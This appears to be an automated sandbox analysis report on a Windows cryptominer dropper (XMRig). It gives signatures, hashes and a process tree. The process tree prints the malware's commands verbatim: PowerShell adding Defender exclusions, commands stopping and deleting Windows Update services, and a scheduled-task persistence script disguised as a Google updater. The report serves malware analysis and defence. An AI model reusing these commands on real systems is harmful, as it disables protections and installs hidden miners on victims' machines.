Analysis
-
max time kernel
150s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
27-09-2022 17:22
General
-
Target
b642e29066bc94c378a3de14ba7263ab2190aa4b7c140a667014e388b1fa1da8.exe
-
Size
345KB
-
MD5
074f4690e37f519e136a17d673fb023c
-
SHA1
6ae97f82fafb429df5c4af4e1f708fa72570cedb
-
SHA256
b642e29066bc94c378a3de14ba7263ab2190aa4b7c140a667014e388b1fa1da8
-
SHA512
b3f268cc367d21d5454c906c23a6830677631c0dc1deb6b1ee3d39fba9e9fec7f9b557f0714a75a0bfff1e72416db15bca7d6757f2089024d4ad55d47a3bc9b7
-
SSDEEP
6144:J+WVyOeJwU4oJ9ZETtTMRxM+cJohwzyqtI+F6F2HAcByuwHtc:dIqUj9ZtDMhJojIdF6Flc0uwH
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
-
XMRig Miner payload 2 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
-
Executes dropped EXE 4 IoCs
-
Stops running service(s) 3 TTPs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Themida packer 21 IoCs
Detects Themida, an advanced Windows software protection system.
-
Checks whether UAC is enabled 1 TTPs 2 IoCs
-
Drops file in System32 directory 3 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Drops file in Program Files directory 4 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\b642e29066bc94c378a3de14ba7263ab2190aa4b7c140a667014e388b1fa1da8.exe"C:\Users\Admin\AppData\Local\Temp\b642e29066bc94c378a3de14ba7263ab2190aa4b7c140a667014e388b1fa1da8.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f5⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f5⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f5⤵
- Modifies security service
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f5⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f5⤵
-
C:\Windows\SYSTEM32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#qauvexd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#ceflnjkax#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC5⤵
-
C:\Users\Admin\AppData\Local\Temp\setup1.exe"C:\Users\Admin\AppData\Local\Temp\setup1.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Cache-S-21-2946144819-3e21f723 /TR "C:\Users\Admin\AppData\Local\cache\MoUSO.exe"4⤵
- Creates scheduled task(s)
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#qauvexd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe dyaqxbmsoinnnm2⤵
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe ugxlnakznvqhxgmt GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqiKy9RognxgdgL26xl6pHcgBuSDH82m22H2uTx/gYzO827+5kpstbfmCCWwx/haNMZTpvRN2AWJn3nj807NkQH/uc5YsiTBf742xyjDXcUT/RYfnhcLyzybIWgXn+7JafUmbaP5sh35EaxsiGFShuRY1L5Fi1uvVZnjU0an3bePXHEXYChHiocVdekR4gVKAc85wY8WomQkvNXfo8OnI8G68t0jyGDhrkDKs7kWaJz2DMj5MokwVvSUi2Y2TsrAP/8HOYVji2aTn31s7dz3/WlCN+UmM7HFUgStV0krKswFnOvNVFJHtjMrdLvilnrbVN4TalQD/4emuEzW66JneW1mD4z/F1I8voeixdh9ABkSX5OmiklgByXQ8r/0t6T+lh2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"1⤵
- Drops file in Program Files directory
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor2⤵
-
C:\Users\Admin\AppData\Local\cache\MoUSO.exeC:\Users\Admin\AppData\Local\cache\MoUSO.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.9MB
MD55b37374180f0a683e712a5b8549b59b9
SHA1dc46ada630be3f02f90af6cca3c5d3504a155271
SHA256ea12f92050fd6116fa26a8e4347629e1063ce81fda487774ef31fdbf56a0f7e6
SHA51246701bbb70bd8a72d09fbc4d9e6750325aa8444248479e85da5bd42c6d6d5ba2253d707f8bbe9d64c2e78973d30ff4b64441970a987f41363bf098e4d9f4ed1f
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.9MB
MD55b37374180f0a683e712a5b8549b59b9
SHA1dc46ada630be3f02f90af6cca3c5d3504a155271
SHA256ea12f92050fd6116fa26a8e4347629e1063ce81fda487774ef31fdbf56a0f7e6
SHA51246701bbb70bd8a72d09fbc4d9e6750325aa8444248479e85da5bd42c6d6d5ba2253d707f8bbe9d64c2e78973d30ff4b64441970a987f41363bf098e4d9f4ed1f
-
C:\Program Files\Google\Libs\g.logFilesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27Filesize
1KB
MD5922a04002a52165b0c0b27f79ed974bc
SHA11ff341fef63201a2f4d9d9745bdab5efe4a0ead5
SHA2569b0fa20acda490feeacb2b19e45d61c6193f1c240062c778945a51c4621a1619
SHA512fed81f3f34f94e6d3bb41e7b3135132f2ea2ca4e7e1325335a358c889dc77512981d3de6177e39b552c3502e5eb72a7545f2aef01e2400c3c1e691c6ce4b5074
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27Filesize
408B
MD52d830446dfc4cd436919d27b9529c7af
SHA1fde9d51cdd2cbf11a577ba84768c6c6b7e22d701
SHA256047fac689437d869d393fa2c31c7b6417fd412420f721790bcc60927ffb138bf
SHA512a602316461688a54f6159c8637b250dc450f60bc9be988c8c3813ed0b40e4ddcd89e2ca664ada918407f4907894b6a9a329ebb5d7b8ba16b82a9414f19001c2c
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD56d42b6da621e8df5674e26b799c8e2aa
SHA1ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA2565ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA51253faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD520b2f6ad2d2accd37fbd46b9d9bf8989
SHA191db3ff9493d1ab55efb65b715a2a8c61a72adbd
SHA25632fef7d0dd7c43bd3440fca325e363d04b667c385d13d4dd44528f35b0167bed
SHA512acf13e39320da7837d169c2575d6575eb638f41f6deead0915785269effebe334adc5f8d73d6621aa4eea047b261fabd50ffc9449f47126953534059e8ff7501
-
C:\Users\Admin\AppData\Local\Temp\setup.exeFilesize
7.9MB
MD5b05cc3582c5e33d30c701c8440e82735
SHA1a25c238dd26c32b2d73df0ab1a640be26fd20604
SHA2565519da4913e8e82897713e2d04b4ffab3b4fe88abe96856c353c25eb9248db78
SHA51200734e47b31b72f5a82e275289144d711dea6fd6c34458e4ef6a77a0cf0b38ecf5170127448d354eee28d71187a9e0799238c6e85d9415656dbf4b69ea1c628c
-
C:\Users\Admin\AppData\Local\Temp\setup.exeFilesize
7.9MB
MD5b05cc3582c5e33d30c701c8440e82735
SHA1a25c238dd26c32b2d73df0ab1a640be26fd20604
SHA2565519da4913e8e82897713e2d04b4ffab3b4fe88abe96856c353c25eb9248db78
SHA51200734e47b31b72f5a82e275289144d711dea6fd6c34458e4ef6a77a0cf0b38ecf5170127448d354eee28d71187a9e0799238c6e85d9415656dbf4b69ea1c628c
-
C:\Users\Admin\AppData\Local\Temp\setup1.exeFilesize
1.3MB
MD5f972aa6646402a3694cca2d30c63e1f6
SHA1400ea692dd0cc0ae129fafee31ab18657f5d14f4
SHA2566513398503a9a37b85b3223a2b020aef82f9c7aedb708d6cc586c0c09b983c8b
SHA512d5bbf351abddf73ab1a8f9c739ab7f30ce89e0f20539df887f0da314ccb36326a960b93e6ddf5c6f2ea60414ed492b74cf3919c73668a317d7d2381d38641337
-
C:\Users\Admin\AppData\Local\Temp\setup1.exeFilesize
1.3MB
MD5f972aa6646402a3694cca2d30c63e1f6
SHA1400ea692dd0cc0ae129fafee31ab18657f5d14f4
SHA2566513398503a9a37b85b3223a2b020aef82f9c7aedb708d6cc586c0c09b983c8b
SHA512d5bbf351abddf73ab1a8f9c739ab7f30ce89e0f20539df887f0da314ccb36326a960b93e6ddf5c6f2ea60414ed492b74cf3919c73668a317d7d2381d38641337
-
C:\Users\Admin\AppData\Local\cache\MoUSO.exeFilesize
1.3MB
MD5f972aa6646402a3694cca2d30c63e1f6
SHA1400ea692dd0cc0ae129fafee31ab18657f5d14f4
SHA2566513398503a9a37b85b3223a2b020aef82f9c7aedb708d6cc586c0c09b983c8b
SHA512d5bbf351abddf73ab1a8f9c739ab7f30ce89e0f20539df887f0da314ccb36326a960b93e6ddf5c6f2ea60414ed492b74cf3919c73668a317d7d2381d38641337
-
C:\Users\Admin\AppData\Local\cache\MoUSO.exeFilesize
1.3MB
MD5f972aa6646402a3694cca2d30c63e1f6
SHA1400ea692dd0cc0ae129fafee31ab18657f5d14f4
SHA2566513398503a9a37b85b3223a2b020aef82f9c7aedb708d6cc586c0c09b983c8b
SHA512d5bbf351abddf73ab1a8f9c739ab7f30ce89e0f20539df887f0da314ccb36326a960b93e6ddf5c6f2ea60414ed492b74cf3919c73668a317d7d2381d38641337
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
4KB
MD5bdb25c22d14ec917e30faf353826c5de
SHA16c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5b42c70c1dbf0d1d477ec86902db9e986
SHA11d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA2568ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA51257fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5
-
C:\Windows\system32\drivers\etc\hostsFilesize
2KB
MD53bfcf3dcec7c368b05ba5a438a3b9881
SHA1cd6cf6c61a9bd771f758eacee125cdb4768f4fa8
SHA256cd3ff091770d028710c162bfd8619c06775fc0e6bfea31a39f8910637dc6d038
SHA512dea8295b48e510cd23481d88e19b57e43f3d1f2261f2e131e198744184fa8a684b5ba23bab90401b6b585ed4f3c0462343463ff11c4066a744523b6098c3abd7
-
memory/796-188-0x00007FF604E20000-0x00007FF605CE6000-memory.dmpFilesize
14.8MB
-
memory/796-140-0x00007FF604E20000-0x00007FF605CE6000-memory.dmpFilesize
14.8MB
-
memory/796-144-0x00007FF604E20000-0x00007FF605CE6000-memory.dmpFilesize
14.8MB
-
memory/796-145-0x00007FF604E20000-0x00007FF605CE6000-memory.dmpFilesize
14.8MB
-
memory/796-153-0x00007FF604E20000-0x00007FF605CE6000-memory.dmpFilesize
14.8MB
-
memory/796-154-0x00007FFBDB450000-0x00007FFBDB645000-memory.dmpFilesize
2.0MB
-
memory/796-142-0x00007FF604E20000-0x00007FF605CE6000-memory.dmpFilesize
14.8MB
-
memory/796-147-0x00007FF604E20000-0x00007FF605CE6000-memory.dmpFilesize
14.8MB
-
memory/796-146-0x00007FF604E20000-0x00007FF605CE6000-memory.dmpFilesize
14.8MB
-
memory/796-141-0x00007FF604E20000-0x00007FF605CE6000-memory.dmpFilesize
14.8MB
-
memory/796-187-0x00007FFBDB450000-0x00007FFBDB645000-memory.dmpFilesize
2.0MB
-
memory/796-143-0x00007FFBDB450000-0x00007FFBDB645000-memory.dmpFilesize
2.0MB
-
memory/796-138-0x0000000000000000-mapping.dmp
-
memory/880-183-0x0000000000000000-mapping.dmp
-
memory/896-252-0x0000000076F10000-0x00000000770B3000-memory.dmpFilesize
1.6MB
-
memory/896-251-0x0000000000240000-0x0000000000598000-memory.dmpFilesize
3.3MB
-
memory/896-254-0x0000000000240000-0x0000000000598000-memory.dmpFilesize
3.3MB
-
memory/896-250-0x0000000000240000-0x0000000000598000-memory.dmpFilesize
3.3MB
-
memory/896-253-0x0000000000240000-0x0000000000598000-memory.dmpFilesize
3.3MB
-
memory/1048-160-0x0000000000000000-mapping.dmp
-
memory/1140-182-0x0000000000000000-mapping.dmp
-
memory/1156-176-0x0000000000000000-mapping.dmp
-
memory/1612-238-0x0000000000000000-mapping.dmp
-
memory/1736-164-0x0000000000000000-mapping.dmp
-
memory/1740-240-0x00007FF68A3C25D0-mapping.dmp
-
memory/1740-247-0x00007FF689BD0000-0x00007FF68A3C4000-memory.dmpFilesize
8.0MB
-
memory/1740-242-0x00007FF689BD0000-0x00007FF68A3C4000-memory.dmpFilesize
8.0MB
-
memory/1740-243-0x000001879EBE0000-0x000001879EC00000-memory.dmpFilesize
128KB
-
memory/1744-137-0x0000000140000000-0x0000000140023000-memory.dmpFilesize
140KB
-
memory/1744-133-0x0000000140003FEC-mapping.dmp
-
memory/1744-150-0x0000000140000000-0x0000000140023000-memory.dmpFilesize
140KB
-
memory/1744-134-0x0000000140000000-0x0000000140023000-memory.dmpFilesize
140KB
-
memory/1744-132-0x0000000140000000-0x0000000140023000-memory.dmpFilesize
140KB
-
memory/1744-136-0x0000000140000000-0x0000000140023000-memory.dmpFilesize
140KB
-
memory/1744-135-0x0000000140000000-0x0000000140023000-memory.dmpFilesize
140KB
-
memory/1764-225-0x0000000000000000-mapping.dmp
-
memory/2160-181-0x0000000000000000-mapping.dmp
-
memory/2204-219-0x0000000000000000-mapping.dmp
-
memory/2284-231-0x0000000000000000-mapping.dmp
-
memory/2288-169-0x0000000000000000-mapping.dmp
-
memory/2336-229-0x0000000000000000-mapping.dmp
-
memory/2392-177-0x0000000000000000-mapping.dmp
-
memory/2432-178-0x0000000000000000-mapping.dmp
-
memory/2528-239-0x0000000000000000-mapping.dmp
-
memory/2532-180-0x00007FFBBB5C0000-0x00007FFBBC081000-memory.dmpFilesize
10.8MB
-
memory/2532-184-0x00007FFBBB5C0000-0x00007FFBBC081000-memory.dmpFilesize
10.8MB
-
memory/2532-166-0x0000000000000000-mapping.dmp
-
memory/3092-190-0x0000000000000000-mapping.dmp
-
memory/3168-163-0x00007FFBBB5C0000-0x00007FFBBC081000-memory.dmpFilesize
10.8MB
-
memory/3168-158-0x0000000000000000-mapping.dmp
-
memory/3168-159-0x00000247BA760000-0x00000247BA782000-memory.dmpFilesize
136KB
-
memory/3172-228-0x0000000000000000-mapping.dmp
-
memory/3172-174-0x0000000000000000-mapping.dmp
-
memory/3176-148-0x0000000000000000-mapping.dmp
-
memory/3176-162-0x00000000000F0000-0x0000000000448000-memory.dmpFilesize
3.3MB
-
memory/3176-152-0x0000000076F10000-0x00000000770B3000-memory.dmpFilesize
1.6MB
-
memory/3176-155-0x00000000000F0000-0x0000000000448000-memory.dmpFilesize
3.3MB
-
memory/3176-161-0x0000000076F10000-0x00000000770B3000-memory.dmpFilesize
1.6MB
-
memory/3224-168-0x0000000000000000-mapping.dmp
-
memory/3240-192-0x00007FFBBB700000-0x00007FFBBC1C1000-memory.dmpFilesize
10.8MB
-
memory/3240-186-0x0000000000000000-mapping.dmp
-
memory/3244-227-0x0000000000000000-mapping.dmp
-
memory/3292-232-0x0000000000000000-mapping.dmp
-
memory/3480-165-0x0000000000000000-mapping.dmp
-
memory/3672-236-0x00007FF71AEE14E0-mapping.dmp
-
memory/3932-179-0x0000000000000000-mapping.dmp
-
memory/4072-237-0x0000000000000000-mapping.dmp
-
memory/4088-214-0x0000000000000000-mapping.dmp
-
memory/4092-234-0x00007FFBBB700000-0x00007FFBBC1C1000-memory.dmpFilesize
10.8MB
-
memory/4092-216-0x0000000000000000-mapping.dmp
-
memory/4092-233-0x00007FFBBB700000-0x00007FFBBC1C1000-memory.dmpFilesize
10.8MB
-
memory/4092-235-0x000001E9E9EC9000-0x000001E9E9ECF000-memory.dmpFilesize
24KB
-
memory/4156-212-0x00007FFBBB700000-0x00007FFBBC1C1000-memory.dmpFilesize
10.8MB
-
memory/4156-208-0x000002B22F970000-0x000002B22F98A000-memory.dmpFilesize
104KB
-
memory/4156-205-0x000002B22F7C0000-0x000002B22F7CA000-memory.dmpFilesize
40KB
-
memory/4156-204-0x000002B22F6E0000-0x000002B22F6FC000-memory.dmpFilesize
112KB
-
memory/4156-211-0x000002B22F960000-0x000002B22F96A000-memory.dmpFilesize
40KB
-
memory/4156-203-0x00007FFBBB700000-0x00007FFBBC1C1000-memory.dmpFilesize
10.8MB
-
memory/4156-202-0x0000000000000000-mapping.dmp
-
memory/4156-209-0x000002B22F920000-0x000002B22F928000-memory.dmpFilesize
32KB
-
memory/4156-210-0x000002B22F950000-0x000002B22F956000-memory.dmpFilesize
24KB
-
memory/4156-206-0x000002B22F930000-0x000002B22F94C000-memory.dmpFilesize
112KB
-
memory/4156-207-0x000002B22F910000-0x000002B22F91A000-memory.dmpFilesize
40KB
-
memory/4300-222-0x0000000000000000-mapping.dmp
-
memory/4560-221-0x0000000000000000-mapping.dmp
-
memory/4692-220-0x0000000000000000-mapping.dmp
-
memory/4772-246-0x00007FF6752C0000-0x00007FF676186000-memory.dmpFilesize
14.8MB
-
memory/4772-194-0x00007FF6752C0000-0x00007FF676186000-memory.dmpFilesize
14.8MB
-
memory/4772-200-0x00007FFBDB450000-0x00007FFBDB645000-memory.dmpFilesize
2.0MB
-
memory/4772-196-0x00007FF6752C0000-0x00007FF676186000-memory.dmpFilesize
14.8MB
-
